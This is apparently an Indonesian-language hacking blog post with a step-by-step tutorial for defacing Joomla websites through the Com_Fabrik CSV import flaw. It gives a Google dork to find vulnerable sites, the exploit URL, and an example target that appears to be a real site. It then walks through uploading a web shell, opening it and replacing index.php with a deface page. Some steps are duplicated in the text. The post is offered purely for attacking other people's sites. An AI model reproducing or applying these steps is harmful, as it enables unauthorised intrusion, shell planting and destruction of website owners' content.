kali ini saya akan memberi tahu anda bagaimana cara mendeface web joomla dengan metode Exploit Joomla ( Com_Fabrik ). Walaupun ini merupakan cara lama untuk mendeface website, tapi tidak ada salahnya untuk mencoba.
Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
Langkah-Langkah:
1. Cari target dengan google dork ini
inurl:viewTable?cid= site:com
*Site: Boleh diganti apa saja. ( contoh: ru /it /ac /za /fi dll )
*Google Dork, kreasikan sendiri.
2. Setelah web dibuka, maka akan muncul Sorry this form is not publish. dan masukkan exploit ini
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
contoh: http://www.toidupada.ee/index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1
3. Masukkan shell milik sobat (Pilih File) dan lalu klik tombol import CSV
4. Setelah proses upload shell selesai, maka akan ada tampilan seperti gambar diatas atau mungkin berbeda dengan gambar diatas. lalu masuk ke dalam shellnya.
www.site.com/media/nama shell kamu.php
contoh: http://www.toidupada.ee/media/shell.php (Jika nama shell anda adalah shell)
*Jika berhasil, akan muncul tampilan shell milik anda. jika tidak berhasil, berarti cari target lain.
5. Klik pada tulisan htdocs/public_html/lainnya sesuai dengan webnya (Tulisan kedua dari belakang).
*Setiap web tiidak selalu sama
6. Cari tulisan yang bernama index.php lalu edit.
*Bukan index.html / lainnya
7. Hapus semua script web dan tempelkan script deface milikmu di index.php. lalu tekan tombol save.
8. Jika save succes maka akan muncul script anda di halaman utama web target.
Post a Comment
Jangan Lupa Untuk Terus Visit blog kami : https://mrwho-404.blogspot.com/?m=1